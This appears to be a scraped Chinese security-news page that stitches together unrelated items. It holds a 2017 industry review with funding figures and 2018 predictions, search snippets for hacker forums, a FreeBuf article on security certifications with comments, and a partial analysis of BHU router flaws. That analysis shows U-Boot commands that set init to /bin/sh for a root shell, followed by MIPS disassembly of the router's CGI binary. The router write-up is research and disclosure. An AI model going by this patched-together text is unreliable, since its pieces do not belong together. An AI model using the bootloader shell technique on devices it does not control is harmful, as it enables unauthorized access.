基于CASB架构的ERP安全公司炼石网络Pre-A融资3000万元;

移动业务安全统一解决方案公司指掌易A+融资1.5亿元。

10月:

移动应用安全公司爱加密(北京智游网安)D轮融资5亿元;

风控反欺诈公司同盾科技C轮融资7280万美元;

数据库安全公司中安威士A+融资2000万元。

11月:

数据安全公司全知科技完成天使轮融资(千万元级)。

12月:

动态防御公司卫达安全Pre-A融资6000万元;

终端安全公司网思科平第二轮融资3500万元;

渗透测试公司四维创智完成天使轮融资(千万元级);

云安全应用公司安百科技A轮融资6000万元;

大数据与云安全公司安数云A轮融资2800万元;

云主机安全公司椒图科技A轮融资8000万元,投资方为360;

自适应安全公司青藤云安全B轮融资近亿元。

2017年国外网络安全融资并购事件频发,涉及公开金额的数字已达300亿美元。据统计,热门领域包括汽车安全、应用安全、机器学习、威胁情报、安全分析等。

2017年国内安全领域创业企业金额总融资额已达35亿人民币,数倍于往年。据统计,反欺诈、大数据、终端安全、云安全、移动安全、数据安全与身份认证均为市场投资的热门领域。

网络安全行业正处于风口,同时前景喜忧参半。由于国家政策以及技术变革的因素,安全行业目前处于风口,各地的安全产业园逐步开始建设,国家也出台了相关的政策引导社会资本的投入。据有关专家研究,国内的安全行业至少还能保持三年的快速增长,不过安全企业如同雨后春笋还需警惕泡沫的出现。

四、行业人才培养

国 际

1、印度反黑客学院成立新公司HLSS,填补人才空缺

2、美国陆军加快步伐招募并留住网络人才

3、日本政府启动培养网络攻击的、高尖端年轻技术人员的计划

国 内

1、学科设立

据调查,网络空间安全是2015年获批设立的工学门类下的一级学科,信息安全则是计算机一级学科下的二级学科。

据教育部消息,全国共940万考生参加2017年高考。经梳理发现,数据科学与大数据技术、物联网工程、网络空间安全等新兴学科增加明显。

北京邮电大学、电子科技大学等8所高等获批网络空间安全专业;

北京印刷学院、太原理工大学等10所高校获批信息安全专业;

华侨大学、长江大学等12所高校新增信息安全专业;

4 所公安院校获批网络安全及执法专业;

北京印刷学院、北京吉利学院等34所高校新增物联网功能专业;

中国人民大学、北京邮电大学等32所高校新增数据科学与大数据技术专业。

2、信息安全专业高校排名

信息是社会发展的重要战略资源,维护网络信息安全至关重要,其中相关人才的培养也是国内的头等大事。据悉,全国共有31所信息安全专业的大学参与排名,其中前10的具体排名情况如下:

2017年网络安全行业大事记

*省内厦门大学和福州大学分别开设网络安全专业和信息安全专业。

▲据调研,9月,教育部公布国内首批一流网络安全学院建设示范高校名单,共有7所高校,分别是:西安电子科技大学、东南大学、武汉大学、北京航空航天大学、四川大学、中国科学技术大学、战略支援部队信息工程大学。

网络安全人才培养存在重大缺口,亟需重视。从目前的安全市场来看,不管是国外还是国内,关于网络安全人才的培养还相对薄弱,人才培养的计划也尚不明确。21世纪人才是最重要的资源,近年来我国高校学历教育培养的信息安全专业人才仅3万余人,而总需求量超过70万余人,人才缺口达到惊人的95%。市场人才可谓是求贤若渴,网络安全人才培养已迫在眉睫。

网络安全专业或将掀起高校报考的狂潮。据悉,我国众多高校关于信息安全、网络安全等相关专业不超过百所。当下全球网络攻击日趋严峻,同时2016年习总书记指出:培养网信人才、要下大功夫、下大本钱,请优秀的老师,编优秀的教材,招优秀的学生,建一流的网络空间安全学院。网络安全以及政策的双重因素下,未来各高校网络安全专业的设立以及人才的培养或将成为网络安全的新浪潮。

五、2018年网络安全趋势预测

第四次工业革命(工业4.0)带来了前所未有的商机,但同时亦增加了网络攻击的必然性。Gartner公司最新的预测数据显示,2018年全球信息安全产品与服务支出总额增加到930亿美元。综合考量2017年经历的网络安全事件,2018年整个网络安全行业的趋势或将:

1、勒索软件攻击者:新的目标和技术

勒索攻击成为网络攻击的一种新常态,攻击方式不断花样翻新。由于用户采用了供应商的防御软件和解决方案,以及加强防范教育和安全策略,传统的勒索软件活动的盈利能力将会继续下降。网络攻击者将调整目标,从传统的目标转向利润更高的勒索目标,其中包括高净值个人、连接设备和企业。

从传统角度看,勒索软件技术的应用将超越个人勒索、网络破坏,以及组织破坏的目标。这种攻击将给对手带来更大破坏和更大财务影响,这不仅会引发网络犯罪“商业模式”的新变种,而且会开始加快推动网络保险市场的扩张。

2、人工智能:机器学习的“军备竞赛”

机器学习可以处理大量的数据,并能够大规模地执行操作来检测和纠正已知的漏洞、可疑行为,以及零日攻击。但是网络黑客正在利用机器学习为他们的攻击提供技术支持,从防御反应中学习,试图破坏检测模型,以及比防御者更快地利用新发现的漏洞。

安全投资人认为,人工智能将是下一代安全解决方案的核心。人工智能防御系统能从黑客攻击事件中,学会各种攻击和防御策略。它能设定正常用户行为的基准,然后搜索异常行为,速度比人类要快得多。这比维持一支专门处理网络攻击的安全团队要省钱得多。人工智能也可以用来制定防御策略。

3、会有更多的僵尸网络物联网(IoT)攻击

2018年,我们将继续看到一些物联网设备被用于僵尸网络活动。不安全的设备仍有很多,对黑客们而言是极易攻击的目标。由于制造商安全能力不足和行业监管缺失,2018年物联网设备的安全威胁将愈演愈烈,对用户的个人隐私、资金财产乃至人身安全造成巨大损失。我国政府在2017年下半年密集出台了推进IPv6、5G、工业互联网等多项前沿科技发展的政策,将助推物联网更快的普及。但其安全威胁也日趋严重,物联网威胁不止是网络安全问题,还将牵涉到人身安全,我们亟需可实施的防护解决方案。

4、云、物联网与数字化推动身份认证技术变革

身份与访问管理(IAM)是一个比较成熟安全领域,但这不意味着没有变化。随着越来越多用户访问远程或者云端资源,身份已经成为当前最主要的攻击对象。此外,云服务、设备、传统软件的结合呈现了越来越多样化的趋势,如何安全地管理身份验证已经成为了一大难题。

5、面部识别技术可能在身份验证中发挥作用

身份验证一般是发布一些证书用于公众可信的数字签名,相比之下,虽然面部识别技术还不够精准,而且缺乏保障,但在2018年仍有可能将它们用于第一阶段的简单电子签名认证。随着这项技术的发展,特别是苹果公司正在使用的配有各种硬件传感器和摄像机的此项技术,在未来的两到四年内,将可能成为等同于面对面身份验证的技术。

6、TLS 1.0和早期的协议将最终成为历史,Https将全网取代Http

今年,在谷歌和Mozilla推动下,HTTPS页面加载和安全站点的数量都有强劲增长。Chrome 56和Chrome62现在将所有带输入字段的网站都标记为不安全网站,Chrome一直都将收集密码或信用卡信息的网站标记为不安全网站。将来所有的HTTP站点都将会被标记为不安全,这只是一个时间问题。

随着谷歌和Mozilla继续向HTTP页面添加越来越多的警告,并且最终这些页面都会得到内有一个醒目红色感叹号的三角形提醒,我们预计HTTPS的采用率会继续显著提高。

7、针对关键基础设施的网络攻击升级,攻防两端的对抗将加剧

2018年以破坏和窃取情报为目的,针对关键基础设施的攻击将逐渐升级:

1、国家力量和恐怖组织、敌对势力推动的,以“网络战”和“恐怖袭击”为目的针对关键基础设施的网络攻击会增加;

2、攻击目标从电力、交通等“命脉”设施,延伸到公共服务系统、重要工业企业的生产设施、互联网关键基础设施;

3、类似永恒之蓝的武器化的攻击工具会愈演愈烈,攻击手段呈现多样化,针对性的勒索攻击风险加剧,间谍事件增多,新型恶意软件和攻击工具增加。

我国相关主管机构也已经组织了多次针对电力、民航等关键基础设施的攻防演习,从已经实施的《网络安全法》到正在征求意见的《关键信息基础设施保护条例》,都将关键基础设施保护上升到了国家战略层面,集中力量、加大投入、创新技术、提升能力将成为保障关键基础设施安全的趋势和方向。

8、培养网络空间安全人才将成为行业热点

以培养和提升网络安全实战能力为目标的攻防演练比赛和网络安全学院成为行业热点。2017年开始,国内攻防演练和攻防比赛的热度开始明显升温,据不完全统计,全年国内各类不同规模的攻防演练超过了100场,各类网络安全攻防比赛的总数近200场,参与比赛人次近60000人。

2018年,攻防演练和攻防会继续成为热点。专家认为,攻防演练将进一步调整演练方法、方式,扩大范围,增强实效;在实战中选好盾、用好矛,分层分类分级解决安全问题,推进演练模式多样化;时间上从年度演练或不定期演练向全年常态化延伸;模式上从比赛式向研究式解决问题延伸;方法上从背靠背向面对面延伸,刚柔相济、重点帮扶,在解决军民融合问题上寻求更大的突破和亮点。

9、政企机构将从购买安全产品转变到购买安全服务

安全实施演变成安全能力交付,政企机构从购买产品到购买服务,安全服务化将快速成长。随着网络安全威胁形势的不断变化,以及越来越严苛的网络安全监管环境,政企用户对于安全的需求在不断增强,他们的安全需求从基本合规逐步转向真正的安全防护需求。

2018年,政企用户在网络安全方面的支出将进一步增加,以服务的形式购买安全能力、以云的方式交付安全能力将成为趋势。“安全服务特别是IT外包、咨询与实施部署服务将成为增长速度最快的细分领域。同时客户对于附加硬件支持的整体需求将不断下降。”

10、个人数据隐私保护将通过法律等技术手段向前推进务

隐私保护从争议话题开始迈向通过法律和技术方案的务实推进。为应对云计算、大数据、移动互联网及跨境数据处理等应用场景所带来的新挑战,2016 年欧盟通过了新的数据保护法案《一般数据保护条例》(GDPR),并将于 2018 年5月生效。2018年,超过50%的公司将受到GDPR影响,且将会制造新一轮热点,驱动2018年数据安全市场投入增加65%。

目前我国没有统一的个人信息保护法,但是通过“徐玉玉案”等一系列案件给社会带来的不良影响,使人们充分意识到了个人信息泄露和滥用所带来的严重社会危害,同时也催生个人信息保护立法落地。

尽管网络威胁值得各行各业加以关注,但是据有关人士指出,银行行业、金融服务业与保险业、医疗卫生行业、零售行业、电信行业、制造业、政府机构等行业在未来发展的道路中都将存在潜在的网络安全威胁,其网络安全保障的发展道路还相当漫长!

我们已经告别2017年,迎来崭新的2018年,人工智能、5G、虚拟现实等新兴技术正在向我们招手。网络“战场”的攻与防远远还没有停止,未来将是一个不变的话题,没有网络安全就没有国家安全,保护网络空间安全,维护网络空间命运共同体将是这个时代赋予企业和从业人员的重大使命。

0daybank

黑客论坛

HACK80_最专业的黑客技术论坛

提醒:该页面因站点更换网址或服务不稳定等原因可能无法正常访问!了解详情
HACK80是集黑客技术交流、黑客工具分享的黑客论坛,与传统黑客联盟不同,我们在守法的前提下提倡自由的技术交流,力求成为一个气氛优秀的技术圈子。

免费黑客网,黑客技术入门教程 - 危险漫步博客

危险漫步的个人博客,黑客技术相关研究及思考;攻与防的对立,是中国访问量最大的黑客博客,拥有大量活跃读者,九...

:::中国黑客联盟::: www.ChinaHacker.com 欢迎登陆 China Hacker ...

关于我们 | 分站申请 | DDOS防御 | 技术论坛?| 站内导航 | 合作伙伴 | ...版权所有 中国黑客联盟 (Hacker Union For China V 6.22) 闽ICP备05007859号 ...

黑客基地论坛

但随着网络的推广与普及,许多黑客也将目光对准了这一领域。由于他们技术娴熟、...网络安全公司Malwarebytes在本周一(10月29)发布的消息称,其论坛成员1vladimir注意...

黑客技术论坛?- 红黑联盟

黑客技术论坛:泄露数据告诉你,黑客论坛Nulled IO用户都用哪些密码?2013年,国外老牌技术新闻和信息分

吾爱漏洞 - 国内最专业的黑客技术博客!

吾爱漏洞,专注于黑客技术研究及思考,是一个综合性的黑客入门技术分享交流、资源共享博客。

转载请注明来自freebuf黑客与极客 - FreeBuf互联网安全新媒体平台

FreeBuf,国内领先的互联网安全新媒体,同时也是爱好者们交流与分享安全技术的社区。...?黑客?漏洞 安全工具 WEB安全 系统安全 网络安全 无线安全 设备/客户端安全 ...

...免杀,入侵,攻防,黑客编程,扫描,破解等首选独特黑客论坛! - ...

独特论坛?登录 注册?论坛?精彩热帖 搜索帖子 ?★独☆特★新☆手★区★ ...35QQ黑客{QQ technology} 1502 / 16万 1 小时前 ?独特黑客技术专区 49程序...

小风教程网-黑客_免费黑客网_黑客技术教程_黑客软件工具

小风教程网是最好免费黑客网!致力于黑客技术学习的正规运用,普及黑客网络安全知识,汇聚最新黑客软件、黑客工具,为您提供从基础到深入的黑客技术学习平台。

CN-HACK.NET-中国黑客榜中榜

黑客门户?黑客论坛?网络安全 黑客兵器 黑客游戏 病毒防御 黑客博客 黑客微博 【收藏本站】 推荐系列 ? SILIC安全 ? 360安全播报 ? 3k博客 ? 阿德马博客...

0daybank

freebuf

FreeBuf互联网安全新媒体平台

FreeBuf,国内领先的互联网安全新媒体,同时也是爱好者们交流与分享安全技术的社区。... 精品公开课?FreeBuf匠心打造精品高端课程 普通公开课 分享安全领域的知识与智慧。FreeBuf是一片国内外极客的聚集地,在这里你可以找到极客软件分享,学习极客技术知识。... 精品公开课?FreeBuf匠心打造精品高端课程 普通公开课 分享安全领域的知识0daybank

qq申诉技巧







支付宝领红包





0daybank

安全认证

安全认证

投稿

你值得拥有的8大国际安全认证

secist2017-03-12208143人围观 ,发现 17 个不明物体安全管理资讯

1.jpg

随着网络安全问题的日益突出化,网络安全也越来越受到人们的重视。从高校到企业,从普通民众再到国家层面,网络安全开始贯穿我们的整个生活。2016年发生了许多攻击事件,几乎所有联网的个人或企业甚至国家都难以幸免。因此,网络安全的人才也越来越受到企业的青睐,市面上也开始出现了种类的证书培训机构。那么,哪些证书的含金量高,值得我们去考呢?以下,我为大家整理出了8大你值得拥有的安全认证。

cissp-logo-stacked.png

CISSP(认证注册信息系统安全师)

CISSP 英文全称:“Certified Information Systems Security Professional”,中文全称:“(ISC)?注册信息系统安全专家”,由(ISC)?组织和管理,是目前全球范围内最权威,最专业,最系统的信息安全认证。CISSP对行业各领域的安全专业人员都有认证,包括软件开发,信息安全和医疗保健等。

该组织以信息系统安全专业人员(CISSP)认证而闻名。专家需在CISSP公共知识体系(CBK)的八个领域获得认证,它们分别为:安全和风险管理,资产安全,安全工程,通信和网络安全,身份和访问管理,安全评估和测试,安全操作和软件开发安全 。

这种认证,一般是为已经具备软件开发,并能实施和管理企业安全计划的安全专家而准备的。

认证条件:在信息系统安全CBK规定的8个考试领域中,最少拥有2个范围的专业经验5年。这对那些通过测试,而缺乏经验的人是一个障碍。

考试:CISSP认证的信息系统安全专业人员考试(共250题,时间为:6小时,分数占比70%为通过)

考试费用约为:$ 599 美元

相关链接:

概述

培训材料

在线课程

certs-oscp.png

OSCP(渗透测试认证)

OSCP认证,是一个专门针对Kali Linux渗透测试培训课程的专业认证。该认证机构声称,OSCP认证是一个区别于所有其它认证的考试,考试全程采取手动操作的方式,而不设笔试环节。

每个OSCP考生,都拥有24小时的时间(实际是23小时45分钟)去完成考试,具体如何分配时间由考生自己决定。题目是5台主机(随机抽取),目标是攻入并拿到最高权限(ROOT/SYSTEM)。基于难度级别,成功执行的攻击会获得相应的积分。

认证条件:

考试:OSCP的认证考试也是另类的存在,考生拥有24小时的时间(实际是23小时45分钟)去完成考试,具体如何分配时间由考生自己决定。题目是5台主机(随机抽取),目标是攻入并拿到最高权限(ROOT/SYSTEM)。24小时结束之后,你还有24小时去完成并提交考试报告(需要详细说明攻击步骤和里程碑截屏来证明确实攻破并获得相应权限)。

考试费用约为:$ 800 美元(30天实验室访问+认证)

相关链接:

概述

培训材料

certs-hcispp.png

HCISPP(认证医疗信息与隐私安全员)

Shearer 说:医疗保健行业,已经成为网络攻击的主要目标之一。随着医疗保健机构面临的安全风险日益增加,医疗保健行业的安全人才变得炙手可热。

(ISC)?为保护医疗数据的安全人员,提供了医疗信息与隐私安全员(HCISPP)认证。考试评估HCISPP CBK六个领域的知识,分别为:医疗保健行业,环境监管,医疗保健的隐私和安全,信息治理和风险管理,信息风险评估和第三方风险管理。

认证条件:在相关领域至少有2年的全职工作经验。其中一年,必须是前三个医疗保健领域(医疗保健行业,环境监管,以及医疗保健的隐私和安全)的任何组合。

考试:HCISPP医疗信息与隐私安全员(考试时间为:3小时,共125个题目,占比70%通过)

考试费用约为:$?349美元(美洲)

相关链接:

概述

培训材料

comptia-securityplus.png

CompTIA Security+(美国计算机行业协会安全认证)

CompTIA Security + 被认为是一本入门级的认证。虽然该认证不需要过多的经验,但参与考试的考生通常需要具备一定的专业知识,并且需在该领域至少拥有2年的工作经历。

CompTIA Security + ?认证涵盖了网络安全,合规性和操作安全,威胁和漏洞,应用程序、数据和主机安全,访问控制和身份管理以及加密技术等方面的能力认证。

认证条件:无,但建议考生最好已拥有CompTIA Network +认证和至少两年的IT安全管理经验。

考试:CompTIA?Security +(考试时间为:90分钟,90个题目左右,750/900分为通过)

考试费用约为:$?320?美元

相关链接:

测试准备

CompTIA CertMaster?- (不是必须的)

certs-gsec.png

GIAC安全要素认证(GIAC Security Essentials,GSEC)

GIAC安全要素认证,是由SANS研究所颁发的。主要用于对安全专业人员专业知识的考察。 申请人必须对包括 IP分组,网络协议,DNS,TCP,策略框架,网络映射,认证,事件响应以及病毒和恶意代码在内的,各种安全知识有着较为深入的理解。

认证条件:无。考生可自主选择,是否参加包括考试费的培训课程。

考试:(180个题目,考试时间为:5个小时,及格分数73%)

考试费用约为:$1,249 美元

相关链接:

更多细节

概述

certs-ccsp.png

CCSP(认证云安全专家)

来自(ISC)的云安全专家(CCSP)认证?面向专注于云的专业人员。随着越来越多的企业使用云,云安全无疑也成为了企业关注的焦点。CCSP主要评估六个领域的能力:云数据安全,架构概念和设计要求,云平台和基础设施安全,云应用安全,运营和法律。

Shearer 说: “人们对于云的安全性还有诸多疑虑。因此,需要有人能够以安全有效的方式,将他们的组织迁移到云。

CCSP 针对专业人员的认证,申请者必须具备至少5年的全职IT工作经验,并且至少有三年是在信息安全领域,以及一年在云安全领域。

认证条件:

考试:云安全专家认证(考试时间为:4小时,共125个问题,及格分数70%)

考试费用约为:$ 549 美元(美洲)

相关链接:

训练研讨

考试大纲

Screen-Shot-2017-02-17-at-1.42.33-PM.png

CISM(认证信息安全经理)

信息系统审计与控制协会(Information Systems Audit and Control Association,ISACA)认证,主要包括信息安全经理(CISM)和信息系统审计师(Certified Information Systems Auditor,CISA)认证。

CISM可以确保持证人掌握信息安全知识,信息安全项目开发与管理知识。他们具有良好的合规性,能确保安全和业务目标之间的一致性,以及开发和管理信息安全计划的能力。

认证条件:至少有五年的信息安全相关工作经验,或至少有三年的信息安全管理经验。工作经验,必须在认证申请之日起的10年内完成。

考试:信息安全经理认证(共200题,合格分数为:450分)

考试费用约为:会员 $ 465 美元; 非会员 $ 595 美元

相关链接:

研究材料

复习课程

cwsp.png

CWSP(认证无线安全专家)

CWSP(认证无线安全专家)认证,是来自认证无线网络专业人员(CWNP)组织的专业级无线局域网认证。

CWSP 主要评估网络安全专业人员对无线软件,工具,趋势和技术的理解。考试中涉及的具体领域包括:WLAN发现技术,入侵和攻击技术,无线入侵防御系统(WIPS)实施,802.11协议分析,以及通过802.11网络使用的,第2层和第3层VPN等。

CWSP是CWNP认证无线网络专家(CWNE)认证的一部分,这是其认证无线网络专业(CWNP)计划的最后一步。申请人经过多年的经验积累,力求获取CWNE认证,以证明其专业水平。

认证条件:

考试:认证无线安全专家(考试时间为:90分钟,共60个问题,及格分数70%)

考试费用约为:?$ 225 美元

相关链接:

关于CWNP

注册

*参考来源 :DarkReading,FB小编 secist 编译,转载请注明来自FreeBuf.COM

这些评论亮了

  • hblf回复
    2016拿下了CISSP,争取未来三年再拿下一个!
    )7(亮了
  • 用户6110833146回复
    求帮助。今天我玩手游然后说可以帮忙刷元宝,我转了一千多块钱过去,然后没有给我刷,还把我游戏里的元宝拿走了一千四百多个。这有办法解决吗?
    )7(亮了
发表评论

已有 17 条评论

  • MyKings?(2级)?2017-03-12回复1楼

    居然没有CEH

    亮了(3)
  • hblf?2017-03-12回复2楼

    2016拿下了CISSP,争取未来三年再拿下一个!

    亮了(7)
  • 用户6110833146?2017-03-12回复3楼

    求帮助。今天我玩手游然后说可以帮忙刷元宝,我转了一千多块钱过去,然后没有给我刷,还把我游戏里的元宝拿走了一千四百多个。这有办法解决吗?

    亮了(7)
    • DDvv?(3级)一只特立独行的猪?2017-03-13回复

      @ 用户6110833146 建议多读书,多看资讯,少玩网游,让大脑健康发展。

      亮了(3)
    • ArthurKiller?(7级)窃.格瓦拉驻FreeBuf办事处?2017-03-13回复

      @ 用户6110833146 少玩游戏多看书,少生孩子多养猪

      亮了(3)
    • 弹幕免疫者郭敬明?(1级)?2017-03-13回复

      @ 用户6110833146 晃一晃大脑,你听,海哭的声音

      亮了(1)
  • softbug?(7级)011101000110100001100001011011...?2017-03-12回复4楼

    有没有一种认证是不收费的? 什么都不缺了,就缺钱。

    亮了(3)
    • secist?(6级)每个人的心中都有一个梦。。?2017-03-12回复

      @ softbug? 没钱就洗洗睡吧

      亮了(2)
    • deep4ox?(3级)?2017-03-13回复

      @ softbug? 自签名证书

      亮了(3)
  • a2465?(1级)这家伙太懒了,还未填写个人描述!?2017-03-12回复5楼

    我想问下 这个网站有没有qq群 用户交流群之类的?

    亮了(0)
  • 你叫何志武是吧?2017-03-12回复6楼

    哈哈,我没想都达成。太贵了

    亮了(1)
  • 大头君儿?2017-03-12回复7楼

    大师现在1/8 ?

    亮了(0)
  • Syne?(1级)做奥利奥的?2017-03-12回复8楼

    隔壁专业毕业有个GCHQ证书,就是对外国人来说没什么用啦

    亮了(0)
  • x1aoh0n?(2级)信息安全工程师?2017-03-13回复9楼

    除了CISSP看起来很受到认可之外 其他的有必要考吗?

    亮了(0)
  • victorwang?(1级)信息安全工程师?2017-03-13回复10楼

    写的还是很受认可的,以为能出现CISP,没出现就证明很客观。其实做信息安全有CISSP就很不错了。

    亮了(0)
  • mvpbin?2017-03-18回复11楼

    提醒一下大家Comptia security+认证考试今年夏天考试会出新版本 到时候会没资料复习 所以想考的人尽量6月份之前考了

    亮了(1)
  • zoonctrl?(5级)该怎么做好信息安全??2017-04-08回复12楼

    证书只是辅助,关键还是高度和思路!

    亮了(2)
表情插图

取消

secist

secist

每个人的心中都有一个梦。。

49 篇文章18 条评论

相关阅读

  • 国内某知名应用市场遭仿冒,EvilPea病毒也玩起O2O
  • 雅虎某团体的6500万Tumblr账户数据在黑市热卖
  • 超3200万Twitter账户密码泄露,Twitter表示“不能怪我”!
  • 流行应用AddThis存在postMessage XSS漏洞漏洞,百万站点受影响
  • 专访知名民间黑客洪流:未竟武侠梦,仗剑行天涯

特别推荐

关注我们 分享每日精选文章

不容错过

  • [Blackhat]2014美国黑帽大会有哪些精彩的议题?FB情报组2014-08-07
  • 如何基于菜刀PHP一句话实现单个文件批量上传?安全小飞侠2015-12-28
  • FreeBuf公开课:Wi-Fi安全与渗透测试(第一集)FB视频2015-03-25
  • Hacking Team流量攻击之EXE攻击分析LiukerTeam2016-01-23

css.php

正在加载中...

0daybank

必虎

必虎

投稿

必虎路由器大量高危漏洞分析

ArthurKiller2016-08-25313958人围观 ,发现 14 个不明物体终端安全资讯

前言

这件事情还得从几个月前说起。有一名叫做Tao Sauvage的老外开开心心的来中国旅游。想着得带点中国的土特产回去,选了半天,选中了一款叫做必虎的无线路由器。

QQ截图20160823122219.png

看着这个超低的价格和完美的做工,这个老外感觉自己赚大发了,简直是天赐礼物!249!买不了吃亏!249!买不了上当!必虎的英文翻译叫做“Tiger Will Power”,我擦!叼炸天的名字啊!虎之力路由器!感觉身体被掏空!但是因为是国产路由器,谷歌翻译也不准确,他也不懂中文。

QQ截图20160823125031.png

怎么办呢?把路由器拆开研究一下看看吧!橙色的地方可以插入一个SD卡,而红色的地方是UART引脚。故事(漏洞),就是从这里开始的,然后以下的“他”将由第一人称来叙述。

QQ截图20160823125430.png

提取路由器固件

废话不多说,直接拿BusPirate连接上这些引脚再说!

Bp-action-2ii.jpg

开启设备后查看自己的终端,返回了以下信息。

QQ截图20160823130252.png

它说按下任意键继续。好吧,这个我随便按了键,然后看到了菜单设置。

##################################

#?? BHU Device bootloader menu?? #

##################################

[1(t)] Upgrade firmware with tftp //通过tftp对固件进行升级

[2(h)] Upgrade firmware with httpd //通过httpd对固件进行升级

[3(a)] Config device aerver IP Address //设置设备服务器的IP地址

[4(i)] Print device infomation //打印设备信息

[5(d)] Device test //设备测试

[6(l)] License manager //许可证管理

[0(r)] Redevice //控制器

[ (c)] Enter to commad line?(2) //按下c查看其它命令

先按下C发现它用的是U-boot,那么可以对其bootargs参数进行设置,这样就不再局限于init程序内了。

Please input cmd key:

CMD> printenv bootargs

bootargs=board=Urouter console=ttyS0,115200 root=31:03 rootfstype=squashfs,jffs2 init=/sbin/init(3)?mtdparts=ath-nor0:256k(u-boot),64k(u-boot-env),1408k(kernel),8448k(rootfs),1408k(kernel2),1664k(rescure),2944kr),64k(cfg),64k(oem),64k(ART)

CMD> setenv bootargs board=Urouter console=ttyS0,115200 rw rootfstype=squashfs,jffs2 init=/bin/sh(4)?mtdparts=ath-nor0:256k(u-boot),64k(u-boot-env),1408k(kernel),8448k(rootfs),1408k(kernel2),1664k(rescure),2944kr),64k(cfg),64k(oem),64k(ART)

CMD> boot

然后再使用printenv命令查看了U-boot的基本设置情况,然后发现只要引导顺序完成,就会运行“/sbin/init”,而这个二进制文件主要负责初始化路由器的Linux系统的。我们使用setenv命令把‘/sbin/init’ 和 ‘/bin/sh’替换一下,要不然是没有办法访问系统文件的。然后再使用boot命令继续刚才的引导。以上几步操作完成后,我们成功的进入了shell命令界面,如下所示。

BusyBox v1.19.4 (2015-09-05 12:01:45 CST) built-in shell (ash)

Enter 'help' for a list of built-in commands.

# ls

version ?upgrade ?sbin ? ? proc ? ? mnt ? ? ?init ? ? dev

var ? ? ?tmp ? ? ?root ? ? overlay ?linuxrc ?home ? ? bin

usr ? ? ?sys ? ? ?rom ? ? ?opt ? ? ?lib ? ? ?etc

QQ截图20160823170005.png

千辛万苦,现在我已经可以通过shell命令访问路由器,并且提取固件。接下来我可以分析必虎路由器的通用网关接口和WEB界面了。当然,有很多种方式可以提取这个路由器的固件,我采用的是修改U-Boot参数开启网络,把全部的文件复制到我的电脑上。感兴趣的朋友可以看看这篇文章:《LinuxBootArgs》

逆向分析

现在我需要对这些文件进行整理。首先,我得知道哪些文件是属于web管理接口的,而下面这个是路由器的初始设置。

# cat /etc/rc.d/rc.local

/* [omitted] */

mongoose -listening_ports 80 &

/* [omitted] */

这个Mongoose程序开启了80端口,很熟悉的端口啊!估计这个程序就是必虎路由器的WEB服务器程序了。功夫不负有心人,我还是找到了这个WEB程序的相关文档:《mongoose》。根据文档所示,Mongoose会把WEB目录下的所有文件解析为.cgi后缀。如下面所示。

# ls -al /usr/share/www/cgi-bin/

-rwxrwxr-x ? ?1 ? ? 29792 cgiSrv.cgi

-rwxrwxr-x ? ?1 ? ? 16260 cgiPage.cgi

drwxr-xr-x ? ?2 ? ? ? ? 0 ..

drwxrwxr-x ? ?2 ? ? ? ?52 .

这个路由器的WEB界面主要依赖于两个非常重要的文件。

cgiPage.cgi:这个文件主要是负责控制面板内的页面排序功能

cgiSrv.cgi:这个文件主要是负责后台管理的各个组件的功能

cgiSrv.cgi这个文件是最有意思的,它可以对路由器所有的设置进行更新,所以我打算先从它开始下手。

$ file cgiSrv.cgi

cgiSrv.cgi: ELF 32-bit MSB executable, MIPS, MIPS32 rel2 version 1 (SYSV), dynamically linked (uses shared libs), stripped

我使用IDA对其进行逆向分析。虽然这个文件已经剥离了所有的调试符合,包括函数名之类的,但是从main函数开始,这个文件变的有意思起来。

LOAD:00403C48? # int __cdecl main(int argc, const char **argv, const char **envp)

LOAD:00403C48???????????????? .globl main

LOAD:00403C48 main:??????????????????????????????????? # DATA XREF: _ftext+18|o

/* [omitted] */

LOAD:00403CE0???????????????? la????? $t9, getenv

LOAD:00403CE4???????????????? nop

(6)?# 检索请求方式

LOAD:00403CE8??? ?????????????jalr??? $t9 ; getenv

(7)?# arg0 = “REQUEST_METHOD”

LOAD:00403CEC?? ??????????????addiu?? $a0, $s0, (aRequest_method - 0x400000)? # "REQUEST_METHOD"

LOAD:00403CF0???????????????? lw????? $gp, 0x20+var_10($sp)

LOAD:00403CF4????????? ???????lui???? $a1, 0x40

(8)?# arg0 = getenv(“REQUEST_METHOD”)

LOAD:00403CF8???? ????????????move??? $a0, $v0

LOAD:00403CFC???????????????? la????? $t9, strcmp

LOAD:00403D00???????????????? nop

(9)?# 检查请求方式是否为POST

LOAD:00403D04???? ????????????jalr??? $t9 ; strcmp

(10)?# arg1 = “POST”

LOAD:00403D08???? ????????????la????? $a1, aPost?????? # "POST"

LOAD:00403D0C???????????????? lw????? $gp, 0x20+var_10($sp)

(11)?# 如果请求方式不是POST就进行跳转 LOAD:00403D10???? ????????????bnez??? $v0, loc_not_post

LOAD:00403D14???????????????? nop

(12)?# 如果请求方式是POST就调用handle_post

LOAD:00403D18???? ????????????jal???? handle_post

LOAD:00403D1C???????????????? nop

/* [omitted] */

同样的逻辑也试用于GET类型的请求。如果收到了GET类型的请求,那么会调用相关的函数,并且重命名为handle_get。让我们一起来看看handle_get函数部分。

img4.png

上面这个模块流程图主要展示了程序内的“if {} else if {} else {}”判断流程。每个函数部分都会检查数据包是否是GET类型的。我们先来看看A模块吧。

/* [omitted] */

LOAD:00403B3C loc_403B3C:???????????????????????? ?????# CODE XREF: handle_get+DC|j

LOAD:00403B3C?????? ??????????la????? $t9, find_val

(13)?# arg1 = “file

LOAD:00403B40??? ?????????????la????? $a1, aFile?????? # "file"

(14)?# 在URL内检索“file”参数的value

LOAD:00403B48?? ??????????????jalr??? $t9 ; find_val

(15)?# arg0 = url

LOAD:00403B4C? ???????????????move??? $a0, $s2? # s2 = URL

LOAD:00403B50???????????????? lw????? $gp, 0x130+var_120($sp)

(16)?# 如果没有“?file=”参数,那么就跳转其他页面

LOAD:00403B54???? ????????????beqz??? $v0, loc_not_file_op

LOAD:00403B58? ???????????????move??? $s0, $v0

(17)?# 如果有“file”,那么调用handler

LOAD:00403B5C?? ??????????????jal???? get_file_handler

LOAD:00403B60? ???????????????move??? $a0, $v0

在A模块,handler_get函数会先检查在URL内的file参数,并且调用find_val,如果file参数出现在URL内,那么该函数会调用get_file_handler。

LOAD:00401210 get_file_handler:??????????????????????? # CODE XREF: handle_get+140|p

/* [omitted] */

LOAD:004012B8 loc_4012B8:????????????????????????????? # CODE XREF: get_file_handler+98j

LOAD:004012B8???????????????? lui???? $s0, 0x41

LOAD:004012BC???????????????? la????? $t9, strcmp

(18)?# arg0 = “file”参数的值

LOAD:004012C0???? ????????????addiu?? $a1, $sp, 0x60+var_48

(19)?# arg1 = “syslog”

